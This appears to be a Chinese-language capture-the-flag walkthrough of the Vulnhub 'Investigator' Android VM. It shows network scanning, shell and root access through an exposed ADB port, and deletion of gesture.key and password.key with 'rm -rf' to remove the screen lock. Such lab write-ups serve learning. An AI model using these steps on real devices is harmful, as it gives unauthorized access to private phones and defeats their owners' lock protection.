Investigator
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:c8:78:7a 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:20:60:06 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 05:21 EDT
Nmap scan report for kb.final (192.168.56.254)
Host is up (0.000077s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: android_x86; model: VirtualBox; device: x86)
8080/tcp open http PHP cli server 5.5 or later
|_http-title: Welcome To UnderGround Sector
|_http-open-proxy: Proxy might be redirecting requests
22000/tcp open ssh Dropbear sshd 2014.66 (protocol 2.0)
| ssh-hostkey:
| 1024 b3986598fdc064fe16d63036aa2bef6b (DSA)
| 2048 19e29e6cc68daf4e867c3b609133e185 (RSA)
|_ 521 46134349248806856c759373b51d8f28 (ECDSA)
MAC Address: 08:00:27:20:60:06 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Android, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.85 seconds
NMAP扫描结果表明目标主机有3个开放端口:5555(adb)、8080(http)、22000(ssh)
获得Shell
这是一个模拟Android手机的系统。
┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ nikto -h http://192.168.56.254:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 8080
+ Start Time: 2023-04-15 05:25:06 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2023-04-15 05:26:08 (GMT-4) (62 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
使用adb工具进行分析
─(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ sudo apt install -y adb
┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ adb connect 192.168.56.254
connected to 192.168.56.254:5555
┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ adb devices -l
List of devices attached
192.168.56.254:5555 device product:android_x86 model:VirtualBox device:x86 transport_id:1
然后获得目标android的shell
┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ adb -s 192.168.56.254 shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ id
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ su
uid=0(root) gid=0(root)@x86:/ # id
uid=0(root) gid=0(root)
uid=0(root) gid=0(root)@x86:/ # cd /root
sh: cd: /root: No such file or directory
2|uid=0(root) gid=0(root)@x86:/ # ls
acct
cache
config
d
data
default.prop
dev
etc
file_contexts
init
init.bluetooth.rc
init.environ.rc
init.rc
init.superuser.rc
init.trace.rc
init.usb.rc
init.x86.rc
lib
mnt
proc
property_contexts
sbin
sdcard
seapp_contexts
sepolicy
storage
sys
system
ueventd.android_x86.rc
ueventd.rc
vendor
x86.prop
uid=0(root) gid=0(root)@x86:/ # cd data
uid=0(root) gid=0(root)@x86:/data # ls
anr
app
app-asec
app-lib
app-private
backup
bugreports
dalvik-cache
data
dontpanic
drm
local
lost+found
media
mediadrm
misc
property
resource-cache
root
security
ssh
system
tombstones
user
uid=0(root) gid=0(root)@x86:/data # cd root
uid=0(root) gid=0(root)@x86:/data/root # ls
flag.txt
uid=0(root) gid=0(root)@x86:/data/root # cat flag.txt
Great Move !!!
Itz a easy one right ???
lets make this one lil hard
You flag is not here !!!
Agent "S" Your Secret Key ---------------->259148637uid=0(root) gid=0(root)@x86:/data/root #
竟然不用密码直接可以切换到root ,虽然得到flag.txt文件,但是说Your flag is not here
接下来从系统目录中删除密钥文件以禁用屏幕锁定保护。
uid=0(root) gid=0(root)@x86:/data/system # ls *.key
gesture.key
password.key
uid=0(root) gid=0(root)@x86:/data/system # rm -rf *.key
然后重启虚拟机(也就是目标Android系统),屏保就消失了
当我们想打开messaging这个应用的时候,发现被app lock锁定,因此需要先uninstall这款应用
┌──(kali㉿kali)-[~/Vulnhub/Investigator]
└─$ adb -s 192.168.56.254 shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ su -
root@x86:/ # adb uninstall com.martianmode.applock
* daemon not running. starting it now on port 5038 *
* daemon started successfully *
- waiting for device -
当想uninstall applock的时候进程不响应了,不知道是不是因为我将网络模式改为host-only的原因。